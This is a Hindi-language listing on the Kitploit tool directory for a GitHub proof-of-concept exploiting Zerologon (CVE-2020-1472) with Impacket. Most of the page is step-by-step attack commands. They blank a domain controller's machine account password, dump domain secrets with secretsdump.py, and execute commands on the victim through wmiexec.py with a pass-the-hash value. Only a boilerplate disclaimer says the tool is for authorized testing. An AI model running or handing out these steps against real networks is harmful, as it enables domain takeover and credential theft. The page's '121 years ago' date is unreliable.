Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ZerologonWithImpacket-CVE2020-1472 — CVE-2020-1472 (Zerologon) के लिए एक व्यावहारिक प्रूफ-ऑफ-कॉन्सेप्ट जो Impacket लाइब्रेरी का उपयोग करके Netlogon कमजोरी का शोषण करता है और अनधिकृत डोमेन कंट्रोलर पहुंच प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

CVE-2020-1472 (Zerologon) के लिए एक व्यावहारिक प्रूफ-ऑफ-कॉन्सेप्ट जो Impacket लाइब्रेरी का उपयोग करके Netlogon कमजोरी का शोषण करता है और अनधिकृत डोमेन कंट्रोलर पहुंच प्राप्त करता है।

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

Zerologon और Impacket संयोजन शोषण (CVE-2020-1472)

इस रिपॉजिटरी में Zerologon शोषण का एक अद्यतन कार्यान्वयन (2024) शामिल है जो CVE-2020-1472 (Zerologon) का शोषण करने के लिए Impacket टूल्स के साथ संयुक्त है। यह शोषण विंडोज सर्वर वातावरणों को लक्षित करता है ताकि मशीन खाता पासवर्ड में हेरफेर किया जा सके और पार्श्व गति (lateral movement) की जा सके।

विशेषताएँ

  • CVE-2020-1472 (Zerologon) का शोषण करके लक्ष्य के मशीन खाता पासवर्ड को एक खाली स्ट्रिंग पर सेट करता है।
  • पीड़ित मशीन पर क्रेडेंशियल्स डंप करने और कमांड निष्पादित करने के लिए Impacket टूल्स का उपयोग करता है।

आवश्यकताएँ

  1. Python 3.x
  2. आवश्यक निर्भरताएँ स्थापित करने के लिए निम्नलिखित चलाएँ:
    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

उदाहरण परिदृश्य

  • पीड़ित: Windows Server 2016
  • हमलावर: Kali Linux (या Windows सिस्टम)

शोषण कमांड (Kali Linux)

  1. मशीन खाता पासवर्ड को खाली स्ट्रिंग पर सेट करें:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. डोमेन कंट्रोलर से रहस्य डंप करें:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. पीड़ित मशीन पर कमांड निष्पादित करें:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

शोषण कमांड (Windows हमलावर)

  1. मशीन खाता पासवर्ड को खाली स्ट्रिंग पर सेट करें:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. डोमेन कंट्रोलर से रहस्य डंप करें:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. पीड़ित मशीन पर कमांड निष्पादित करें:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

नोट्स

  • WIN-C9PAHHGJN91 और 192.168.40.145 को लक्ष्य के वास्तविक होस्टनाम और IP पते से बदलें।
  • इस टूल का उपयोग करने से पहले सुनिश्चित करें कि आपके पास उचित प्राधिकरण है।
  • यह टूल केवल शैक्षिक और पैठ परीक्षण उद्देश्यों के लिए है।

अस्वीकरण

इस टूल का जिम्मेदारी से उपयोग करें। स्पष्ट अनुमति के बिना सिस्टम का शोषण करने के लिए इस टूल का अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें